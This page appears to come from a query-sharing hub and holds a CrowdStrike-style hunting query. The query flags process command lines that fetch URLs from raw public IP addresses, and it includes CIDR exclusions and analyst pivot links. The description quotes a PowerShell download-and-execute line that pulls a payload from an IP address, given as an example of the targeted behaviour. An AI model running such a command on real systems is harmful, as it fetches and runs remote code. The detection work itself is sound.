
Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage

This query detects Windows processes that use raw public IP addresses inside HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers in order to bypass DNS filtering and logging mechanisms.

EDR · hunting · detection · T1105 · T1059 · T1071.001

FDR · intermediate · por sathishds (cql-hub.com) · 1 min read

Query

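// Detection of external direct-IP usage in process command lines (Windows / Mac).
// Selects process-start events whose CommandLine carries an http(s) URL whose host
// is a literal IPv4 address outside private / special-purpose space. Legitimate
// software normally reaches out by DNS name, so a raw public IP in a command line
// is a common sign of payload staging or C2 and is worth triage.
in(#event_simpleName, values=["ProcessRollup2","SyntheticProcessRollup2"])
// Cheap wildcard pre-filter before the regex work; Linux is out of scope here
| CommandLine=*http* event_platform!="Lin"
// Baseline to exclude legitimate processes (enable and tune per environment)
//| !in(field="ParentBaseFileName", values=["UmbrellaDiagnostic.exe","HPClickExe","Eagle","HPClick.exe"])
//| !in(field="FileName", values=["Google Chrome","chrome.exe"])
//| !in(field="CommandLine", values=["Google Chrome.app"])
// Extract the whole URL: scheme, dotted-quad host, then anything up to whitespace
// or a closing quote/paren (optional port and path). The previous pattern required
// a trailing "/" followed by a word character, so a bare "http://1.2.3.4" or
// "http://1.2.3.4:8080" never matched and was silently dropped.
| regex("(?<Urlink>\\bhttps?://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}[^\\s'\")]*)", field=CommandLine)
// Pull the dotted-quad out of the URL for the CIDR test below.
// NOTE(review): \d{1,3} also accepts octets > 255; confirm how cidr() treats a
// malformed address before relying on the exclusion for such values.
| regex("(?<Ipaddress>\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})", field=Urlink)
// Drop non-routable / special-purpose space so only genuinely public hosts remain:
// multicast, RFC 1918, loopback, link-local, 168.63.0.0/16 (kept from the original
// baseline), "this" network, plus shared address space (RFC 6598), IETF protocol
// assignments, the RFC 5737 documentation nets, benchmarking (RFC 2544), reserved
// 240/4 and limited broadcast, which otherwise surface as noise from sample/test data.
| !cidr(Ipaddress, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "168.63.0.0/16", "0.0.0.0/8", "100.64.0.0/10", "192.0.0.0/24", "192.0.2.0/24", "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "255.255.255.255/32"])
// Baseline to exclude legitimate URLs (enable and tune per environment)
//| !in(field="Urlink", values=["http://100.1.1.1"])
// Some events have no grandparent; give the summary a stable placeholder
| default(field=GrandParentBaseFileName, value="Unknown")
| rootURL := "https://falcon.crowdstrike.com/"
// NOTE(review): FDR ProcessStartTime is epoch seconds while formattime() works on
// epoch milliseconds, so this may render as 1970 unless multiplied by 1000 first —
// confirm against the rendered processStart value.
| ProcessStartTime := round(ProcessStartTime)
| processStart:=formattime(field=ProcessStartTime, format="%m/%d %H:%M:%S")
// If Context Process ID is available utilize it, if not utilize Target Process ID
| case{ ContextProcessId ="*"
| ContextId:=ContextProcessId; TargetProcessId="*"
| ContextId:=TargetProcessId}
// Create pivot links into the Process and Graph Explorers for the analyst
| format("[ProcessExplorer]%sinvestigate/process-explorer/%s/%s?_cid=%s", field=["rootURL", "aid", "ContextId", "cid"], as="ProcessExplorer")
| format("[GraphExplorer]%sgraphs/process-explorer/graph?id=pid:%s:%s", field=["rootURL", "aid", "TargetProcessId"], as="GraphExplorer")
// Format execution details as an indented tree for easy analysis.
// NOTE(review): the "%,.100s" conversion for CommandLine looks like a typo for
// "%.100s" (truncate to 100 chars); confirm format() accepts the "," flag on %s.
| format(format="%s\n\t↳ %s[ppid=%s]\n\t\t↳ %s [pid=%s|raw_pid=%s|start=%s]\n\t\t\t%,.100s[...TRIMMED]\n\t\t\t%s\n\t\t\t%s\n---", field=[GrandParentBaseFileName, ParentBaseFileName, ParentProcessId, ImageFileName, TargetProcessId, RawProcessId, processStart, CommandLine, ProcessExplorer, GraphExplorer], as="ExecutionSummary")
// Group by source host; collect() is capped at 1000 rows per host
| groupBy([ComputerName],function=([count(aid, as=executeCount), min(@timestamp, as=firstSeen), max(@timestamp, as=lastSeen), collect([UserName,ExecutionSummary,Ipaddress,ParentBaseFileName,ParentProcessId,ImageFileName,TargetProcessId], limit=1000)]))
| firstSeen:=formattime(field=firstSeen, format="%Y/%m/%d %H:%M:%S")
| lastSeen:=formattime(field=lastSeen, format="%Y/%m/%d %H:%M:%S")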

Explicación

Importado desde cql-hub.com. Agrega explicación de pipes aquí.

Variables a ajustar

Revisa y ajusta los valores según tu entorno.